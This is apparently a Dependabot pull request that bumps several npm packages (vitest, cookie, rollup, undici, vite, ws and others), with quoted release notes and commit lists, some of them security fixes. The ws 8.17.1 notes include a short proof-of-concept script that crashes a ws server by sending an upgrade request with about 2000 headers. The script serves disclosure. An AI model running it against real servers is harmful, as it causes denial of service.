Bump the npm_and_yarn group across 1 directory with 8 updates

[dependabot]

Bumps the npm_and_yarn group with 6 updates in the / directory:

Package	From	To
vitest	1.3.0	1.6.1
braces	3.0.2	3.0.3
cookie	0.5.0	0.7.2
youch	3.3.3	3.3.4
undici	5.28.4	5.28.5
ws	8.17.0	8.18.0

Updates vitest from 1.3.0 to 1.6.1

Release notes

Sourced from vitest's releases.

v1.6.1

This release includes security patches for:

• Remote Code Execution when accessing a malicious website while Vitest API server is listening | CVE-2025-24964

   🐞 Bug Fixes

• backport vitest-dev/vitest#7317 to v1 - by @​hi-ogawa in vitest-dev/vitest#7319

    View changes on GitHub

v1.6.0

   🚀 Features

• Support standalone mode  -  by @​sheremet-va in vitest-dev/vitest#5565 (bdce0)
• Custom "snapshotEnvironment" option  -  by @​sheremet-va in vitest-dev/vitest#5449 (30f72)
• benchmark: Support comparing benchmark result  -  by @​hi-ogawa and @​sheremet-va in vitest-dev/vitest#5398 (f8d3d)
• browser: Allow injecting scripts  -  by @​sheremet-va in vitest-dev/vitest#5656 (21e58)
• reporter: Support includeConsoleOutput and addFileAttribute in junit  -  by @​hi-ogawa in vitest-dev/vitest#5659 (2f913)
• ui: Sort items by file name  -  by @​btea in vitest-dev/vitest#5652 (1f726)

   🐞 Bug Fixes

• Keep order of arguments for .each in custom task collectors  -  by @​sheremet-va in vitest-dev/vitest#5640 (7d57c)
• Call resolveId('vitest') after buildStart  -  by @​hi-ogawa in vitest-dev/vitest#5646 (f5faf)
• Hash the name of the file when caching  -  by @​sheremet-va in vitest-dev/vitest#5654 (c9e68)
• Don't panic on empty files in node_modules  -  by @​sheremet-va (40c29)
• Use toJSON for error serialization  -  by @​hi-ogawa in vitest-dev/vitest#5526 (19a21)
• coverage:
  • Exclude *.test-d.* by default  -  by @​MindfulPol in vitest-dev/vitest#5634 (bfe8a)
  • Apply vite-node's wrapper only to executed files  -  by @​AriPerkkio in vitest-dev/vitest#5642 (c9883)
• vm:
  • Support network imports  -  by @​sheremet-va in vitest-dev/vitest#5610 (103a6)

   🏎 Performance

• Improve performance of forks pool  -  by @​sheremet-va in vitest-dev/vitest#5592 (d8304)
• Unnecessary rpc call when coverage is disabled  -  by @​AriPerkkio in vitest-dev/vitest#5658 (c5712)

    View changes on GitHub

v1.5.3

   🐞 Bug Fixes

• Use package.json name for a workspace project if not provided  -  by @​sheremet-va in vitest-dev/vitest#5608 (48fba)
• Backport jest iterable equality within object  -  by @​sukovanej in vitest-dev/vitest#5621 (30e5d)
• browser: Support benchmark  -  by @​hi-ogawa in vitest-dev/vitest#5622 (becab)
• reporter: Use default error formatter for JUnit  -  by @​hi-ogawa in vitest-dev/vitest#5629 (20060)

... (truncated)

Commits

• 017e1ee chore: release v1.6.1
• 7ce9fbb fix: backport #7317 to v1 (#7319)
• 6b29f3d chore: release v1.6.0
• f8d3d22 feat(benchmark): support comparing benchmark result (#5398)
• 21e58bd feat(browser): allow injecting scripts (#5656)
• 30f728b feat: custom "snapshotEnvironment" option (#5449)
• 2f91322 feat(reporter): support includeConsoleOutput and addFileAttribute in juni...
• c571276 perf: unnecessary rpc call when coverage is disabled (#5658)
• bdce0a2 feat: support standalone mode (#5565)
• 40c299f fix: don't panic on empty files in node_modules
• Additional commits viewable in compare view

Updates braces from 3.0.2 to 3.0.3

Commits

• 74b2db2 3.0.3
• 88f1429 update eslint. lint, fix unit tests.
• 415d660 Snyk js braces 6838727 (#40)
• 190510f fix tests, skip 1 test in test/braces.expand
• 716eb9f readme bump
• a5851e5 Merge pull request #37 from coderaiser/fix/vulnerability
• 2092bd1 feature: braces: add maxSymbols (https://github.com/micromatch/braces/issues/...
• 9f5b4cf fix: vulnerability (https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727)
• 98414f9 remove funding file
• 665ab5d update keepEscaping doc (#27)
• Additional commits viewable in compare view

Updates cookie from 0.5.0 to 0.7.2

Release notes

Sourced from cookie's releases.

v0.7.2

Fixed

• Fix object assignment of hasOwnProperty (#177) bc38ffd

jshttp/cookie@v0.7.1...v0.7.2

0.7.1

Fixed

• Allow leading dot for domain (#174)
  • Although not permitted in the spec, some users expect this to work and user agents ignore the leading dot according to spec
• Add fast path for serialize without options, use obj.hasOwnProperty when parsing (#172)

jshttp/cookie@v0.7.0...v0.7.1

0.7.0

• perf: parse cookies ~10% faster (#144 by @​kurtextrem and #170)
• fix: narrow the validation of cookies to match RFC6265 (#167 by @​bewinsnw)
• fix: add main to package.json for rspack (#166 by @​proudparrot2)

jshttp/cookie@v0.6.0...v0.7.0

0.6.0

• Add partitioned option

Commits

• d19eaa1 0.7.2
• bc38ffd Fix object assignment of hasOwnProperty (#177)
• cf4658f 0.7.1
• 6a8b8f5 Allow leading dot for domain (#174)
• 58015c0 Remove more code and perf wins (#172)
• ab057d6 0.7.0
• 5f02ca8 Migrate history to GitHub releases
• a5d591c Migrate history to GitHub releases
• 51968f9 Skip isNaN
• 9e7ca51 perf(parse): cache length, return early (#144)
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by blakeembrey, a new releaser for cookie since your current version.

Updates youch from 3.3.3 to 3.3.4

Commits

• See full diff in compare view

Updates rollup from 4.17.2 to 4.34.3

Release notes

Sourced from rollup's releases.

v4.34.3

4.34.3

2025-02-05

Bug Fixes

• Ensure properties of "this" are included in getters (#5831)

Pull Requests

• #5831: include the properties that accessed by this (@​TrickyPi)

v4.34.2

4.34.2

2025-02-04

Bug Fixes

• Fix an issue where not all usages of a function were properly detected (#5827)

Pull Requests

• #5827: Ensure that functions provided to a constructor are properly deoptimized (@​lukastaegert)

v4.34.1

4.34.1

2025-02-03

Bug Fixes

• Ensure throwing objects includes the entire object (#5825)

Pull Requests

• #5825: Ensure that all properties of throw statements are included (@​lukastaegert)

v4.34.0

4.34.0

2025-02-01

Features

• Tree-shake unused properties in object literals (re-implements #5420) (#5737)

Pull Requests

... (truncated)

Changelog

Sourced from rollup's changelog.

4.34.3

2025-02-05

Bug Fixes

• Ensure properties of "this" are included in getters (#5831)

Pull Requests

• #5831: include the properties that accessed by this (@​TrickyPi)

4.34.2

2025-02-04

Bug Fixes

• Fix an issue where not all usages of a function were properly detected (#5827)

Pull Requests

• #5827: Ensure that functions provided to a constructor are properly deoptimized (@​lukastaegert)

4.34.1

2025-02-03

Bug Fixes

• Ensure throwing objects includes the entire object (#5825)

Pull Requests

• #5825: Ensure that all properties of throw statements are included (@​lukastaegert)

4.34.0

2025-02-01

Features

• Tree-shake unused properties in object literals (re-implements #5420) (#5737)

Pull Requests

• #5737: Reapply object tree-shaking (@​lukastaegert, @​TrickyPi)

4.33.0

... (truncated)

Commits

• ac8b06a 4.34.3
• 7d553db include the properties that accessed by this (#5831)
• 615efa0 4.34.2
• 17346a9 Ensure that functions provided to a constructor are properly deoptimized (#5827)
• 0f20524 4.34.1
• 32504b3 Ensure that all properties of throw statements are included (#5825)
• 979d628 4.34.0
• d7062ef Reapply object tree-shaking (#5737)
• 494483e 4.33.0
• 74a251f return null (#5820)
• Additional commits viewable in compare view

Updates undici from 5.28.4 to 5.28.5

Release notes

Sourced from undici's releases.

v5.28.5

⚠️ Security Release ⚠️

Fixes CVE CVE-2025-22150 GHSA-c76h-2ccp-4975 (embargoed until 22-01-2025).

Full Changelog: nodejs/undici@v5.28.4...v5.28.5

Commits

• 6139ed2 Bumped v5.28.5
• 711e207 Backport of c2d78cd
• See full diff in compare view

Updates vite from 5.2.11 to 5.4.14

Release notes

Sourced from vite's releases.

v5.4.14

Please refer to CHANGELOG.md for details.

v5.4.13

Please refer to CHANGELOG.md for details.

v5.4.12

This version contains a breaking change due to security fixes. See GHSA-vg6x-rcgg-rjx6 for more details.

Please refer to CHANGELOG.md for details.

v5.4.11

Please refer to CHANGELOG.md for details.

v5.4.10

Please refer to CHANGELOG.md for details.

v5.4.9

Please refer to CHANGELOG.md for details.

v5.4.8

Please refer to CHANGELOG.md for details.

v5.4.7

Please refer to CHANGELOG.md for details.

v5.4.6

Please refer to CHANGELOG.md for details.

v5.4.5

Please refer to CHANGELOG.md for details.

v5.4.4

Please refer to CHANGELOG.md for details.

v5.4.3

Please refer to CHANGELOG.md for details.

[email protected]

Please refer to CHANGELOG.md for details.

[email protected]

Please refer to CHANGELOG.md for details.

v5.4.2

Please refer to CHANGELOG.md for details.

[email protected]

Please refer to CHANGELOG.md for details.

... (truncated)

Changelog

Sourced from vite's changelog.

5.4.14 (2025-01-21)

• fix: preview.allowedHosts with specific values was not respected (#19246) (9df6e6b), closes #19246
• fix: allow CORS from loopback addresses by default (#19249) (7d1699c), closes #19249

5.4.13 (2025-01-20)

• fix: try parse server.origin URL (#19241) (5946215), closes #19241

5.4.12 (2025-01-20)

• fix!: check host header to prevent DNS rebinding attacks and introduce server.allowedHosts (9da4abc)
• fix!: default server.cors: false to disallow fetching from untrusted origins (dfea38f)
• fix: verify token for HMR WebSocket connection (b71a5c8)
• chore: add deps update changelog (ecd2375)

5.4.11 (2024-11-11)

• fix(deps): update dependencies of postcss-modules (ceb15db), closes #18617

5.4.10 (2024-10-23)

• fix: backport #18367,augment hash for CSS files to prevent chromium erroring by loading previous fil (7d1a3bc), closes #18367 #18412

5.4.9 (2024-10-14)

• fix: bump launch-editor-middleware to v2.9.1 (#18348) (508d9ab), closes #18348
• fix(css): fix lightningcss dep url resolution with custom root (#18125) (eae00b5), closes #18125
• fix(data-uri): only match ids starting with data: (#18241) (96084d6), closes #18241
• fix(deps): bump tsconfck (#18322) (dc5434c), closes #18322
• fix(hmr): don't try to rewrite imports for direct CSS soft invalidation (#18252) (851b258), closes #18252
• fix(ssr): (backport #18150) fix source map remapping with multiple sources (#18204) (262a879), closes #18204
• chore: update all url references of vitejs.dev to vite.dev (#18276) (c23558a), closes #18276
• chore: update license copyright (#18278) (1864eb1), closes #18278
• docs: update homepage (#18274) (ae44163), closes #18274

5.4.8 (2024-09-25)

... (truncated)

Commits

• e7eb3c5 release: v5.4.14
• 7d1699c fix: allow CORS from loopback addresses by default (#19249)
• 9df6e6b fix: preview.allowedHosts with specific values was not respected (#19246)
• a1824c5 release: v5.4.13
• 5946215 fix: try parse server.origin URL (#19241)
• f428aa9 release: v5.4.12
• 9da4abc fix!: check host header to prevent DNS rebinding attacks and introduce `serve...
• b71a5c8 fix: verify token for HMR WebSocket connection
• dfea38f fix!: default server.cors: false to disallow fetching from untrusted origins
• ecd2375 chore: add deps update changelog
• Additional commits viewable in compare view

Updates ws from 8.17.0 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot merge will merge this PR after your CI passes on it
• @dependabot squash and merge will squash and merge this PR after your CI passes on it
• @dependabot cancel merge will cancel a previously requested merge and block automerging
• @dependabot reopen will reopen this PR if it is closed
• @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.